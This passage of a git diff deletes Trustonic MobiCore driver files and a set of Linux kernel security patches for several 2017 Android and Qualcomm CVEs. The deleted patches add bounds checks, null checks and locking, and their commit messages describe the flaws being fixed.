--/* -- * Close TA and unreference session object. 
-- * Object will be freed if reference reaches 0. -- * Session object is assumed to have been removed from main list, which means -- * that session_close cannot be called anymore. -- */ --int session_close(struct tbase_session *session) --{ -- int ret = 0; -- -- if (!session) -- return -ENXIO; -- -- mutex_lock(&session->close_lock); -- switch (mcp_close_session(&session->mcp_session)) { -- case 0: -- /* TA is closed, remove from closing list */ -- mutex_lock(&g_ctx.closing_lock); -- list_del(&session->list); -- mutex_unlock(&g_ctx.closing_lock); -- /* Remove the ref we took on creation, exit if session freed */ -- if (session_put(session)) -- return 0; -- -- break; -- case -EBUSY: -- /* -- * (GP) TA needs time to close. The "TA closed" notification -- * will trigger a new call to session_close(). -- * Return OK but do not unref. -- */ -- break; -- default: -- MCDRV_ERROR("Failed to close session %x in SWd", -- session->mcp_session.id); -- ret = -EPERM; -- } -- -- mutex_unlock(&session->close_lock); -- return ret; --} -- --/* -- * Free session object and all objects it contains (wsm). -- */ --static void session_free(struct kref *kref) --{ -- struct tbase_session *session; -- struct tbase_wsm *wsm, *next; -- -- /* Remove remaining shared buffers (unmapped in SWd by mcp_close) */ -- session = container_of(kref, struct tbase_session, kref); -- list_for_each_entry_safe(wsm, next, &session->wsms, list) { -- MCDRV_DBG("session %p: free wsm %p", session, wsm); -- wsm_free(wsm); -- } -- -- MCDRV_DBG("freed session %p: client %p id %x", -- session, session->client, session->mcp_session.id); -- kfree(session); --} -- --/* -- * Unreference session. -- * Free session object if reference reaches 0. 
-- */ --int session_put(struct tbase_session *session) --{ -- return kref_put(&session->kref, session_free); --} -- --/* -- * Send a notification to TA -- */ --int session_notify_swd(struct tbase_session *session) --{ -- if (!session) { -- MCDRV_ERROR("Session pointer is null"); -- return -EINVAL; -- } -- -- return mcp_notify(&session->mcp_session); --} -- --/* -- * Read and clear last notification received from TA -- */ --int32_t session_exitcode(struct tbase_session *session) --{ -- return mcp_session_exitcode(&session->mcp_session); --} -- --/* -- * Free a WSM object -- */ --static void wsm_free(struct tbase_wsm *wsm) --{ -- /* Remove wsm from its parent session's list */ -- list_del(&wsm->list); -- /* Free MMU table */ -- if (!IS_ERR_OR_NULL(wsm->mmu)) -- tbase_mmu_delete(wsm->mmu); -- -- /* Unref cbuf if applicable */ -- if (wsm->cbuf) -- tbase_cbuf_put(wsm->cbuf); -- -- /* Delete wsm object */ -- MCDRV_DBG("freed wsm %p: mmu %p cbuf %p va %lx len %u", -- wsm, wsm->mmu, wsm->cbuf, wsm->va, wsm->len); -- kfree(wsm); --} -- --static struct tbase_wsm *wsm_create(struct tbase_session *session, -- uintptr_t buf, uint32_t len) --{ -- struct tbase_wsm *wsm; -- struct task_struct *task = NULL; -- uintptr_t va; -- int ret; -- -- /* Allocate structure */ -- wsm = kzalloc(sizeof(*wsm), GFP_KERNEL); -- if (!wsm) { -- ret = -ENOMEM; -- goto err_no_wsm; -- } -- -- /* Add wsm to list so destroy can find it */ -- list_add(&wsm->list, &session->wsms); -- -- /* Check if buffer is contained in a cbuf */ -- wsm->cbuf = tbase_cbuf_get_by_addr(session->client, buf); -- if (wsm->cbuf) { -- uintptr_t offset; -- -- if (client_is_kernel(session->client)) -- offset = buf - tbase_cbuf_addr(wsm->cbuf); -- else -- offset = buf - tbase_cbuf_uaddr(wsm->cbuf); -- -- if ((offset + len) > tbase_cbuf_len(wsm->cbuf)) { -- ret = -EINVAL; -- MCDRV_ERROR("crosses cbuf boundary"); -- goto err; -- } -- /* Provide kernel virtual address */ -- va = tbase_cbuf_addr(wsm->cbuf) + offset; -- } else { -- /* 
Not a cbuf. va is uva or kva depending on client. */ -- /* Provide "task" if client is user */ -- va = buf; -- if (!client_is_kernel(session->client)) -- task = current; -- } -- -- /* Build MMU table for buffer */ -- wsm->mmu = tbase_mmu_create(task, (void *)va, len); -- if (IS_ERR(wsm->mmu)) { -- ret = PTR_ERR(wsm->mmu); -- goto err; -- } -- -- wsm->va = buf; -- wsm->len = len; -- MCDRV_DBG("created wsm %p: mmu %p cbuf %p va %lx len %u", -- wsm, wsm->mmu, wsm->cbuf, wsm->va, wsm->len); -- goto end; -- --err: -- wsm_free(wsm); --err_no_wsm: -- wsm = ERR_PTR(ret); --end: -- return wsm; --} -- --static inline int wsm_check(struct tbase_session *session, -- struct mc_ioctl_buffer *buf) --{ -- struct tbase_wsm *wsm; -- -- list_for_each_entry(wsm, &session->wsms, list) { -- if ((buf->va < (wsm->va + wsm->len)) && -- ((buf->va + buf->len) > wsm->va)) { -- MCDRV_ERROR("buffer %lx overlaps with existing wsm", -- wsm->va); -- return -EADDRINUSE; -- } -- } -- -- return 0; --} -- --static inline struct tbase_wsm *wsm_find(struct tbase_session *session, -- uintptr_t va) --{ -- struct tbase_wsm *wsm; -- -- list_for_each_entry(wsm, &session->wsms, list) -- if (wsm->va == va) -- return wsm; -- -- return NULL; --} -- --static inline int wsm_info(struct tbase_wsm *wsm, struct kasnprintf_buf *buf) --{ -- ssize_t ret; -- -- ret = kasnprintf(buf, "\t\twsm %p: mmu %p cbuf %p va %lx len %u\n", -- wsm, wsm->mmu, wsm->cbuf, wsm->va, wsm->len); -- if (ret < 0) -- return ret; -- -- if (wsm->mmu) { -- ret = tbase_mmu_info(wsm->mmu, buf); -- if (ret < 0) -- return ret; -- } -- -- return 0; --} -- --/* -- * Share buffers with SWd and add corresponding WSM objects to session. 
-- */ --int session_wsms_add(struct tbase_session *session, -- struct mc_ioctl_buffer *bufs) --{ -- struct mc_ioctl_buffer *buf; -- struct mcp_buffer_map maps[MC_MAP_MAX]; -- struct mcp_buffer_map *map; -- int i, ret = 0; -- uint32_t n_null_buf = 0; -- -- /* Check parameters */ -- if (!session) -- return -ENXIO; -- -- /* Lock the session */ -- mutex_lock(&session->wsms_lock); -- -- for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) { -- if (!buf->va) { -- n_null_buf++; -- continue; -- } -- -- /* Avoid mapping overlaps */ -- if (wsm_check(session, buf)) { -- ret = -EADDRINUSE; -- MCDRV_ERROR("maps[%d] va=%llx already map'd", i, -- buf->va); -- goto unlock; -- } -- } -- -- if (n_null_buf >= MC_MAP_MAX) { -- ret = -EINVAL; -- MCDRV_ERROR("va=NULL"); -- goto unlock; -- } -- -- for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) { -- struct tbase_wsm *wsm; -- -- if (!buf->va) { -- map->type = WSM_INVALID; -- continue; -- } -- -- wsm = wsm_create(session, buf->va, buf->len); -- if (IS_ERR(wsm)) { -- ret = PTR_ERR(wsm); -- MCDRV_ERROR("maps[%d] va=%llx create failed: %d", i, -- buf->va, ret); -- goto end; -- } -- -- tbase_mmu_buffer(wsm->mmu, map); -- MCDRV_DBG("maps[%d] va=%llx: t:%u a:%llx o:%u l:%u", i, buf->va, -- map->type, map->phys_addr, map->offset, map->length); -- } -- -- /* Map buffers */ -- if (g_ctx.f_multimap) { -- /* Send MCP message to map buffers in SWd */ -- ret = mcp_multimap(session->mcp_session.id, maps); -- if (ret) -- MCDRV_ERROR("multimap failed: %d", ret); -- } else { -- /* Map each buffer */ -- for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, -- map++) { -- if (!buf->va) -- continue; -- -- /* Send MCP message to map buffer in SWd */ -- ret = mcp_map(session->mcp_session.id, map); -- if (ret) { -- MCDRV_ERROR("maps[%d] va=%llx map failed: %d", -- i, buf->va, ret); -- break; -- } -- } -- } -- --end: -- for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) { -- struct tbase_wsm 
*wsm = wsm_find(session, buf->va); -- -- if (!buf->va) -- continue; -- -- if (ret) { -- if (!wsm) -- break; -- -- /* Destroy mapping */ -- wsm_free(wsm); -- } else { -- /* Store mapping */ -- buf->sva = map->secure_va; -- wsm->sva = buf->sva; -- MCDRV_DBG("maps[%d] va=%llx map'd len=%u sva=%llx", -- i, buf->va, buf->len, buf->sva); -- } -- } -- --unlock: -- /* Unlock the session */ -- mutex_unlock(&session->wsms_lock); -- return ret; --} -- --/* -- * Stop sharing buffers and delete corrsponding WSM objects. -- */ --int session_wsms_remove(struct tbase_session *session, -- const struct mc_ioctl_buffer *bufs) --{ -- const struct mc_ioctl_buffer *buf; -- struct mcp_buffer_map maps[MC_MAP_MAX]; -- struct mcp_buffer_map *map; -- int i, ret = 0; -- uint32_t n_null_buf = 0; -- -- if (!session) { -- MCDRV_ERROR("session pointer is null"); -- return -EINVAL; -- } -- -- /* Lock the session */ -- mutex_lock(&session->wsms_lock); -- -- /* Find, check and map buffer */ -- for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; i++, buf++, map++) { -- struct tbase_wsm *wsm; -- -- if (!buf->va) { -- n_null_buf++; -- map->secure_va = 0; -- continue; -- } -- -- wsm = wsm_find(session, buf->va); -- if (!wsm) { -- ret = -EADDRNOTAVAIL; -- MCDRV_ERROR("maps[%d] va=%llx not found", i, -- buf->va); -- goto out; -- } -- -- /* Check input params consistency */ -- /* TODO: fix the spec, "len" is NOT ignored anymore */ -- if ((wsm->sva != buf->sva) || (wsm->len != buf->len)) { -- MCDRV_ERROR("maps[%d] va=%llx no match: %x != %llx", -- i, buf->va, wsm->sva, buf->sva); -- MCDRV_ERROR("maps[%d] va=%llx no match: %u != %u", -- i, buf->va, wsm->len, buf->len); -- ret = -EINVAL; -- goto out; -- } -- -- tbase_mmu_buffer(wsm->mmu, map); -- map->secure_va = buf->sva; -- MCDRV_DBG("maps[%d] va=%llx: t:%u a:%llx o:%u l:%u s:%llx", i, -- buf->va, map->type, map->phys_addr, map->offset, -- map->length, map->secure_va); -- } -- -- if (n_null_buf >= MC_MAP_MAX) { -- ret = -EINVAL; -- MCDRV_ERROR("va=NULL"); 
-- goto out; -- } -- -- if (g_ctx.f_multimap) { -- /* Send MCP command to unmap buffers in SWd */ -- ret = mcp_multiunmap(session->mcp_session.id, maps); -- if (ret) -- MCDRV_ERROR("mcp_multiunmap failed: %d", ret); -- } else { -- for (i = 0, buf = bufs, map = maps; i < MC_MAP_MAX; -- i++, buf++, map++) { -- if (!buf->va) -- continue; -- -- /* Send MCP command to unmap buffer in SWd */ -- ret = mcp_unmap(session->mcp_session.id, map); -- if (ret) { -- MCDRV_ERROR("maps[%d] va=%llx unmap failed: %d", -- i, buf->va, ret); -- break; -- } -- } -- } -- -- for (i = 0, buf = bufs; i < MC_MAP_MAX; i++, buf++) { -- struct tbase_wsm *wsm = wsm_find(session, buf->va); -- -- if (!wsm) -- break; -- -- /* Free wsm */ -- wsm_free(wsm); -- MCDRV_DBG("maps[%d] va=%llx unmap'd len=%u sva=%llx", i, -- buf->va, buf->len, buf->sva); -- } -- --out: -- mutex_unlock(&session->wsms_lock); -- return ret; --} -- --/* -- * Sleep until next notification from SWd. -- */ --int session_waitnotif(struct tbase_session *session, int32_t timeout) --{ -- return mcp_session_waitnotif(&session->mcp_session, timeout); --} -- --int session_info(struct tbase_session *session, struct kasnprintf_buf *buf) --{ -- struct tbase_wsm *wsm; -- int32_t exit_code = mcp_session_exitcode(&session->mcp_session); -- int ret; -- -- ret = kasnprintf(buf, "\tsession %p: %x rc %d\n", session, -- session->mcp_session.id, exit_code); -- if (ret < 0) -- return ret; -- -- /* WMSs */ -- mutex_lock(&session->wsms_lock); -- if (list_empty(&session->wsms)) -- goto done; -- -- list_for_each_entry(wsm, &session->wsms, list) { -- ret = wsm_info(wsm, buf); -- if (ret < 0) -- goto done; -- } -- --done: -- mutex_unlock(&session->wsms_lock); -- if (ret < 0) -- return ret; -- -- return 0; --} -diff --git a/drivers/gud/MobiCoreDriver/session.h b/drivers/gud/MobiCoreDriver/session.h -deleted file mode 100644 -index aec0c09ae9c9a..0000000000000 ---- a/drivers/gud/MobiCoreDriver/session.h -+++ /dev/null -@@ -1,63 +0,0 @@ --/* -- * Copyright 
(c) 2013-2015 TRUSTONIC LIMITED -- * All Rights Reserved. -- * -- * This program is free software; you can redistribute it and/or -- * modify it under the terms of the GNU General Public License -- * version 2 as published by the Free Software Foundation. -- * -- * This program is distributed in the hope that it will be useful, -- * but WITHOUT ANY WARRANTY; without even the implied warranty of -- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- * GNU General Public License for more details. -- */ -- --#ifndef _SESSION_H_ --#define _SESSION_H_ -- --#include -- --#include "mcp.h" -- --struct tbase_object; --struct tbase_mmu; --struct mc_ioctl_buffer; -- --struct tbase_session { -- /* Session list lock */ -- struct mutex close_lock; -- /* MCP session descriptor (MUST BE FIRST) */ -- struct mcp_session mcp_session; -- /* Owner */ -- struct tbase_client *client; -- /* Number of references kept to this object */ -- struct kref kref; -- /* The list entry to attach to session list of owner */ -- struct list_head list; -- /* Session WSMs lock */ -- struct mutex wsms_lock; -- /* List of WSMs for a session */ -- struct list_head wsms; --}; -- --struct tbase_session *session_create(struct tbase_client *client, bool is_gp, -- struct mc_identity *identity); --int session_open(struct tbase_session *session, const struct tbase_object *obj, -- const struct tbase_mmu *obj_mmu, uintptr_t tci, size_t len); --int session_close(struct tbase_session *session); --static inline void session_get(struct tbase_session *session) --{ -- kref_get(&session->kref); --} -- --int session_put(struct tbase_session *session); --int session_wsms_add(struct tbase_session *session, -- struct mc_ioctl_buffer *bufs); --int session_wsms_remove(struct tbase_session *session, -- const struct mc_ioctl_buffer *bufs); --int32_t session_exitcode(struct tbase_session *session); --int session_notify_swd(struct tbase_session *session); --int session_waitnotif(struct tbase_session *session, int32_t 
timeout); --int session_info(struct tbase_session *session, struct kasnprintf_buf *buf); -- --#endif /* _SESSION_H_ */ -diff --git a/drivers/gud/setupDrivers.sh b/drivers/gud/setupDrivers.sh -deleted file mode 100644 -index 994e83e8d9517..0000000000000 ---- a/drivers/gud/setupDrivers.sh -+++ /dev/null -@@ -1,19 +0,0 @@ --#!/bin/bash --export COMP_PATH_ROOT=$(dirname $(readlink -f $BASH_SOURCE)) #set this to the absolute path of the folder containing this file -- --# This part has to be set by the customer --# To be set, absolute path of kernel folder --export LINUX_PATH= --# To be set, absolute path! CROSS_COMPILE variable needed by kernel eg /home/user/arm-2009q3/bin/arm-none-linux-gnueabi- --export CROSS_COMPILE= --# To be set, build mode debug or release --export MODE=debug --# To be set, the absolute path to the Linux Android NDK --export NDK_PATH= -- --# Global variables needed by build scripts --export COMP_PATH_Logwrapper=$COMP_PATH_ROOT/Logwrapper/Out --export COMP_PATH_MobiCore=$COMP_PATH_ROOT/MobiCore/Out --export COMP_PATH_MobiCoreDriverMod=$COMP_PATH_ROOT/mobicore_driver/Out --export COMP_PATH_MobiCoreDriverLib=$COMP_PATH_ROOT/daemon/Out --export COMP_PATH_AndroidNdkLinux=$NDK_PATH diff --git a/Patches/Linux_CVEs/CVE-2017-9692/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9692/ANY/0001.patch deleted file mode 100644 index c00c3baa..00000000 --- a/Patches/Linux_CVEs/CVE-2017-9692/ANY/0001.patch +++ /dev/null 
@@ -1,31 +0,0 @@
-From 7a86f369594a0b6567820b77d441e778e6adb8a7 Mon Sep 17 00:00:00 2001
-From: Rajkumar Subbiah
-Date: Mon, 15 May 2017 15:17:14 -0400
-Subject: [PATCH] msm: mdss: Fix potential dereferencing of null pointer
-
-During atomic commit on a writeback panel, there is a possibility
-of deferencing a NULL pointer if the configuration changes before
-the commit. This change adds a NULL pointer check to avoid it.
-
-Bug: 36731152
-Change-Id: I56d0efad40992b6f87c81e5eab93cf0f24f6f524
-Signed-off-by: Rajkumar Subbiah
----
- drivers/video/msm/mdss/mdss_fb.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/video/msm/mdss/mdss_fb.c b/drivers/video/msm/mdss/mdss_fb.c
-index 86f380e8a845b..8e02cbf782e0f 100644
---- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -3302,6 +3302,10 @@ int mdss_fb_atomic_commit(struct fb_info *info,
- MSMFB_ATOMIC_COMMIT, true, false);
- if (mfd->panel.type == WRITEBACK_PANEL) {
- output_layer = commit_v1->output_layer;
-+ if (!output_layer) {
-+ pr_err("Output layer is null\n");
-+ goto end;
-+ }
- wb_change = !mdss_fb_is_wb_config_same(mfd,
- commit_v1->output_layer);
- if (wb_change) {
diff --git a/Patches/Linux_CVEs/CVE-2017-9693/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9693/qcacld-2.0/0001.patch
deleted file mode 100644
index 8f77168b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9693/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 05a5abb21e4d97001f77d344444a3ec2f9c275f9 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga
-Date: Tue, 16 May 2017 19:02:16 +0530
-Subject: qcacld-2.0: Trim extn capability to max supported in change station
-
-extn capabilities can be controlled by user, which can
-be sent greater than the max supported value. This results
-in stack overflow in change station command.
-
-Add check to validate extn capability param given by user
-and if it exceeds max supported value, set it to max supported
-value.
-
-CRs-Fixed: 2044820
-Change-Id: I531799dd06c41069e85ad969de6182363dbf9f05
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 8 +++++++-
- 1 file changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 19c2c61..e1f5f0a 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -16209,9 +16209,15 @@ static int __wlan_hdd_change_station(struct wiphy *wiphy,
- StaParams.supported_oper_classes_len =
- params->supported_oper_classes_len;
-
-+ if (params->ext_capab_len > sizeof(StaParams.extn_capability)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-+ "received extn capabilities:%d, resetting it to max supported",
-+ params->ext_capab_len);
-+ params->ext_capab_len = sizeof(StaParams.extn_capability);
-+ }
- if (0 != params->ext_capab_len)
- vos_mem_copy(StaParams.extn_capability, params->ext_capab,
-- sizeof(StaParams.extn_capability));
-+ params->ext_capab_len);
-
- if (NULL != params->ht_capa) {
- StaParams.htcap_present = 1;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9694/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9694/qcacld-2.0/0001.patch
deleted file mode 100644
index bdc5a5ca..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9694/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 1e47d44de7bab5500d27f17ae5c4ebebc7d2b4ef Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga
-Date: Tue, 16 May 2017 18:00:47 +0530
-Subject: qcacld-2.0: Add lost AP sample size entry to nla policy
-
-improper validation of
-QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_LOST_AP_SAMPLE_SIZE
-results in assigning an unchecked user-controller value.
-This can lead to buffer overflow.
-
-validate QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_LOST_AP_SAMPLE_SIZE.
-
-CRs-Fixed: 2045470
-Change-Id: I7c33b6d78054672e9effbe9100c29e5604c250c6
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b53ba75..69b13b5 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -837,6 +837,7 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_LOW] = { .type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_RSSI_HIGH] = { .type = NLA_S32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CONFIGURATION_FLAGS] = { .type = NLA_U32 },
-+ [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_LOST_AP_SAMPLE_SIZE] = { .type = NLA_U32 },
- };
-
- static const struct nla_policy
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9696/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9696/3.10/0001.patch
deleted file mode 100644
index a38c6108..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9696/3.10/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 8b44a684139301fa31548e8120b7e6299965572a Mon Sep 17 00:00:00 2001
-From: Alok Kediya
-Date: Thu, 2 Mar 2017 15:51:35 +0530
-Subject: [PATCH] msm: camera: Bound check for num_of_stream.
-
-- num of stream comes from userspace and used without
-any bound check.It may result to overflow update_info.
-
-CRs-Fixed: 2006829
-
-Bug: 36232584
-Change-Id: I8226e8f7081b28108dbed738ea4579e2051a85f2
-Signed-off-by: Alok Kediya
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index 43a2c77dcc8da..490ab13e4e607 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -817,6 +817,12 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- struct msm_vfe_axi_stream_cfg_update_info *update_info = NULL;
- struct msm_isp_sw_framskip *sw_skip_info = NULL;
-
-+ if (update_cmd->num_streams > MSM_ISP_STATS_MAX) {
-+ pr_err("%s: Invalid num_streams %d\n",
-+ __func__, update_cmd->num_streams);
-+ return -EINVAL;
-+ }
-+
- /*validate request*/
- for (i = 0; i < update_cmd->num_streams; i++) {
- update_info = &update_cmd->update_info[i];
diff --git a/Patches/Linux_CVEs/CVE-2017-9697/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9697/3.18/0001.patch
deleted file mode 100644
index ec34d811..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9697/3.18/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From 4b788ca419ec37e4cdb421fef9edc208a491ce30 Mon Sep 17 00:00:00 2001
-From: Mohit Aggarwal
-Date: Thu, 25 May 2017 20:21:12 +0530
-Subject: [PATCH] diag: Synchronize command registration table access
-
-Currently, command registration table is being read
-in debugfs without any protection which may lead to
-access of stale entries. The patch takes care of the
-issue by adding proper protection.
-
-CRs-Fixed: 2032672
-Bug: 63868628
-Change-Id: I6ae058c16873f9ed52ae6516a1a70fd6d2d0da80
-Signed-off-by: Mohit Aggarwal
----
- drivers/char/diag/diag_debugfs.c | 6 +++++-
- 1 file changed, 5 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index f5e4eba1e96bc..b66c8cb8257c2 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -268,8 +268,10 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- struct list_head *temp;
- struct diag_cmd_reg_t *item = NULL;
-
-+ mutex_lock(&driver->cmd_reg_mutex);
- if (diag_dbgfs_table_index == driver->cmd_reg_count) {
- diag_dbgfs_table_index = 0;
-+ mutex_unlock(&driver->cmd_reg_mutex);
- return 0;
- }
-
-@@ -278,6 +280,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- buf = kzalloc(sizeof(char) * buf_size, GFP_KERNEL);
- if (ZERO_OR_NULL_PTR(buf)) {
- pr_err("diag: %s, Error allocating memory\n", __func__);
-+ mutex_unlock(&driver->cmd_reg_mutex);
- return -ENOMEM;
- }
- buf_size = ksize(buf);
-@@ -322,6 +325,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- break;
- }
- diag_dbgfs_table_index = i;
-+ mutex_unlock(&driver->cmd_reg_mutex);
-
- *ppos = 0;
- ret = simple_read_from_buffer(ubuf, count, ppos, buf, bytes_in_buffer);
diff --git a/Patches/Linux_CVEs/CVE-2017-9697/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9697/4.4/0002.patch
deleted file mode 100644
index 9e19707d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9697/4.4/0002.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From 7e45e3a6c1f6dd46d71fb6824a7cf702d2e79225 Mon Sep 17 00:00:00 2001
-From: Mohit Aggarwal
-Date: Thu, 25 May 2017 20:21:12 +0530
-Subject: diag: Synchronize command registration table access
-
-Currently, command registration table is being read
-in debugfs without any protection which may lead to
-access of stale entries. The patch takes care of the
-issue by adding proper protection.
-
-CRs-Fixed: 2032672
-Change-Id: I6ae058c16873f9ed52ae6516a1a70fd6d2d0da80
-Signed-off-by: Mohit Aggarwal
----
- drivers/char/diag/diag_debugfs.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index ca7dd88..86e626d 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -273,8 +273,10 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- struct list_head *temp;
- struct diag_cmd_reg_t *item = NULL;
-
-+ mutex_lock(&driver->cmd_reg_mutex);
- if (diag_dbgfs_table_index == driver->cmd_reg_count) {
- diag_dbgfs_table_index = 0;
-+ mutex_unlock(&driver->cmd_reg_mutex);
- return 0;
- }
-
-@@ -283,6 +285,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- buf = kzalloc(sizeof(char) * buf_size, GFP_KERNEL);
- if (ZERO_OR_NULL_PTR(buf)) {
- pr_err("diag: %s, Error allocating memory\n", __func__);
-+ mutex_unlock(&driver->cmd_reg_mutex);
- return -ENOMEM;
- }
- buf_size = ksize(buf);
-@@ -327,6 +330,7 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- break;
- }
- diag_dbgfs_table_index = i;
-+ mutex_unlock(&driver->cmd_reg_mutex);
-
- *ppos = 0;
- ret = simple_read_from_buffer(ubuf, count, ppos, buf, bytes_in_buffer);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9702/3.10/0001.patch
deleted file mode 100644
index 2ab44552..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 2ae1eab54e874553c078e5275421398597401ac9 Mon Sep 17 00:00:00 2001
-From: Haibin Liu
-Date: Wed, 17 May 2017 18:52:30 +0800
-Subject: [PATCH] msm: camera: fix untrusted pointer for power down setting
-
-When getting power down setting, there is an untrusted pointer
-from a user space pointer.Need to copy to the kernel space first.
-
-CRs-Fixed: 2037398
-Bug: 36492827
-Change-Id: I64032a96e62ddfeec85eebe984d8ba52754f6148
-Signed-off-by: Haibin Liu
----
- .../platform/msm/camera_v2/sensor/msm_sensor_driver.c | 16 +++++-----------
- 1 file changed, 5 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-index 87e741b651c4a..5d3c56191e0d4 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-@@ -407,17 +407,11 @@ static int32_t msm_sensor_create_pd_settings(void *setting,
-
- #ifdef CONFIG_COMPAT
- if (is_compat_task()) {
-- int i = 0;
-- struct msm_sensor_power_setting32 *power_setting_iter =
-- (struct msm_sensor_power_setting32 *)compat_ptr((
-- (struct msm_camera_sensor_slave_info32 *)setting)->
-- power_setting_array.power_setting);
--
-- for (i = 0; i < size_down; i++) {
-- pd[i].config_val = power_setting_iter[i].config_val;
-- pd[i].delay = power_setting_iter[i].delay;
-- pd[i].seq_type = power_setting_iter[i].seq_type;
-- pd[i].seq_val = power_setting_iter[i].seq_val;
-+ rc = msm_sensor_get_pw_settings_compat(
-+ pd, pu, size_down);
-+ if (rc < 0) {
-+ pr_err("failed");
-+ return -EFAULT;
- }
- } else
- #endif
diff --git a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0002.patch b/Patches/Linux_CVEs/CVE-2017-9702/3.10/0002.patch
deleted file mode 100644
index eba2fa50..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9702/3.10/0002.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From c46b2ecd901a12867d0dd91ae019f4b7256bcfec Mon Sep 17 00:00:00 2001
-From: Haibin Liu
-Date: Wed, 9 Aug 2017 16:26:41 +0800
-Subject: [PATCH] msm: sensor: Fix crash when ioctl VIDIOC_MSM_SENSOR_INIT_CFG
-
-Issue:
